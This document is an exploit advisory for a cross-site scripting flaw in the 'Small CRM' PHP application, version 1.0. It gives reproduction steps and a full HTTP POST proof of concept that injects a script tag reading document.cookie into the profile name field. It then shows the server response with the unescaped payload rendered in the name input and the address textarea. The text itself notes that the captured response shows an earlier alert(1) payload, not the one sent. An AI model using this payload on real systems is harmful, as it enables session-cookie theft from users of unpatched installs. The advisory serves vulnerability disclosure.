# Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting (Reflected)
# Date: 05.06.2024
# Exploit Author: Furkan Eren Tetik
# Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads
# Software Link: https://phpgurukul.com/small-crm-php
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# The Small CRM system can be attacked with XSS using a simple script
# https://www.linkedin.com/in/furkanerentetik/

Steps To Reproduce:
1 - Log in and go to the profile page http://localhost/crm/crm/profile.php
2 - Submit the profile form with payload= 'name='><script>alert(document.cookie)</script>'
3 - Press Enter; the alert box appears.
Note: the captured response below renders an earlier payload (alert(1)) in the name input and the address textarea rather than the value sent in this request, which suggests the unescaped value is persisted in the profile and re-rendered on every visit to profile.php; confirm against the application source.

PoC Request

POST /crm/crm/profile.php HTTP/1.1
Host: localhost
Content-Length: 674
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYFQBlbKN8Nl8KtgW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/crm/crm/profile.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=1
Connection: close

------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="name"

"><script>alert(document.cookie)</script>
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="alt_email"


------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="phone"

0000000000
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="gender"

m
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="address" deneme ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="update" Update ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW-- ---------------------------------------------------------------------------------------------- Response HTTP/1.1 200 OK Date: Tue, 04 Jun 2024 22:22:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13521 <script>alert('Your profile updated successfully.');</script> <!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta charset="utf-8" /> <title>CRM | User Profile</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <meta content="" name="description" /> <meta content="" name="author" /> <link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/> <link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/> <link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/> <link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/> <link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/> <link href="assets/plugins/jquery-scrollbar/jquery.scrollbar.css" rel="stylesheet" type="text/css"/> <link href="assets/css/style.css" rel="stylesheet" type="text/css"/> <link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/> <link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/> </head> <body class=""> <div class="header navbar navbar-inverse "> <div class="navbar-inner"> <div class="header-seperation"> <ul class="nav 
pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none"> <li class="dropdown"> <a id="main-menu-toggle" href="#main-menu" class="" > <div class="iconset top-menu-toggle-white"></div> </a> </li> </ul> <a href="dashboard.php" style="color:#FFF; font-size:24px; margin-top:20%;">CRM</a> <ul class="nav pull-right notifcation-center"> <li class="dropdown" id="header_task_bar"> <a href="dashboard.php" class="dropdown-toggle active" data-toggle=""> <div class="iconset top-home"></div> </a> </li> </ul> </div> <div class="header-quick-nav" > <div class="pull-left"> </div> <div class="pull-right"> <ul class="nav quick-section "> <li class="quicklinks"> <a data-toggle="dropdown" class="dropdown-toggle pull-right " href="#" id="user-options"> <div class="iconset top-settings-dark "></div> </a> <ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options"> <li><a href="profile.php"> My Account</a> </li> <li class="divider"></li> <li><a href="logout.php"><i class="fa fa-power-off"></i> Log Out</a></li> </ul> </li> </ul> </div> <!-- END CHAT TOGGLER --> </div> <!-- END TOP NAVIGATION MENU --> </div> <!-- END TOP NAVIGATION BAR --> </div> <!-- END HEADER --><div class="page-container row-fluid"> <!-- BEGIN SIDEBAR --> <div class="page-sidebar" id="main-menu"> <!-- BEGIN MINI-PROFILE --> <div class="page-sidebar-wrapper scrollbar-dynamic" id="main-menu-wrapper"> <div class="user-info-wrapper"> <div class="profile-wrapper"> <img src="assets/img/user.png" alt="" data-src="assets/img/user.png" data-src-retina="assets/img/user.png" width="69" height="69" /> </div> <div class="user-info"> <div class="greeting" style="font-size:14px;">Welcome</div> <div class="username" style="font-size:12px;">fet</div> <div class="status" style="font-size:10px;"><a href="#"> <div class="status-icon green"></div> Online</a></div> </div> </div> <!-- END MINI-PROFILE --> <!-- BEGIN SIDEBAR MENU --> <p class="menu-title">BROWSE <span class="pull-right"><a 
href="javascript:;"><i class="fa fa-refresh"></i></a></span></p> <ul> <li class="start"> <a href="dashboard.php"> <i class="icon-custom-home"></i> <span class="title">Dashboard</span> <span class="selected"></span> </a> </li> <li><a href="change-password.php"><span class="fa fa-file-text-o"></span> Change Password</a></li> <li><a href="profile.php"><span class="fa fa-user"></span> Profile</a></li> <li ><a href="get-quote.php"> <span class="fa fa-tasks"></span> Request a Quote</a></li> <li ><a href="create-ticket.php"><span class="fa fa-ticket"></span> Create Ticket</a></li> <li ><a href="view-tickets.php"><span class="fa fa-ticket"></span> View Ticket</a></li> </ul> <div class="clearfix"></div> </div> </div> <a href="#" class="scrollup">Scroll</a> <div class="footer-widget"> <div class="progress transparent progress-small no-radius no-margin"> <div data-percentage="79%" class="progress-bar progress-bar-success animate-progress-bar" ></div> </div> <div class="pull-right"> </div> </div> <div class="page-content"> <div id="portlet-config" class="modal hide"> <div class="modal-header"> <button data-dismiss="modal" class="close" type="button"></button> <h3>Widget Settings</h3> </div> <div class="modal-body"> Widget settings form goes here </div> </div> <div class="clearfix"></div> <div class="content"> <div class="page-title"> <h3>fet's Profile</h3> <div class="row"> <div class="col-md-12"> <form class="form-horizontal" method="post" enctype="multipart/form-data"> <div class="panel panel-default"> <div class="panel-heading"> <h3 class="panel-title"><strong>Your Profile</h3> <div align="right"> Registration Date :2024-06-05 01:16:29 </div> </div> <div class="panel-body"> <div class="form-group"> <label class="col-md-3 col-xs-12 control-label">Name</label> <div class="col-md-6 col-xs-12"> <div class="input-group"> <span class="input-group-addon"><span class="fa fa-pencil"></span></span> <input type="text" name="name" value=""><script>alert(1)</script>" 
class="form-control"/> </div> </div> </div> <div class="form-group"> <label class="col-md-3 col-xs-12 control-label">Primary Email </label> <div class="col-md-6 col-xs-12"> <div class="input-group"> <span class="input-group-addon"><span class="fa fa-pencil"></span></span> <input type="text" name="email" value="fet@gmail.com" disabled="disabled" class="form-control"/> </div> </div> </div> <div class="form-group"> <label class="col-md-3 col-xs-12 control-label">alternate Email </label> <div class="col-md-6 col-xs-12"> <div class="input-group"> <span class="input-group-addon"><span class="fa fa-pencil"></span></span> <input type="text" name="alt_email" value="" class="form-control"/> </div> </div> </div> <div class="form-group"> <label class="col-md-3 col-xs-12 control-label">Contact no </label> <div class="col-md-6 col-xs-12"> <div class="input-group"> <span class="input-group-addon"><span class="fa fa-pencil"></span></span> <input type="text" name="phone" value="0000000000" maxlength="10" class="form-control"/> </div> </div> </div> <div class="form-group"> <label class="col-md-3 col-xs-12 control-label">Gender </label> <div class="col-md-6 col-xs-12"> <div class="input-group"> <span class="input-group-addon"><span class="fa fa-pencil"></span></span> <select class="form-control select" name="gender"> <option value="m">Male</option> <option value="m">Male</option> <option value="f">Female</option> <option value="others">Other</option> </select> </select> </div> </div> </div> <div class="form-group"> <label class="col-md-3 col-xs-12 control-label">Address</label> <div class="col-md-6 col-xs-12"> <textarea class="form-control" name="address" rows="5">"><script>alert(1)</script></textarea> </div> </div> </div> <div class="panel-footer"> <button class="btn btn-default" type="reset">Clear Form</button> <input type="submit" value="Update" name="update" class="btn btn-primary pull-right"> </div> </div> </form> </div> </div> </div> </div> </div> </div> <script 
src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script> <script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script> <script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script> <script src="assets/plugins/breakpoints.js" type="text/javascript"></script> <script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script> <script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script> <script src="assets/plugins/jquery-scrollbar/jquery.scrollbar.min.js" type="text/javascript"></script> <script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script> <script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script> <script src="assets/js/core.js" type="text/javascript"></script> <script src="assets/js/chat.js" type="text/javascript"></script> <script src="assets/js/demo.js" type="text/javascript"></script> </body> </html>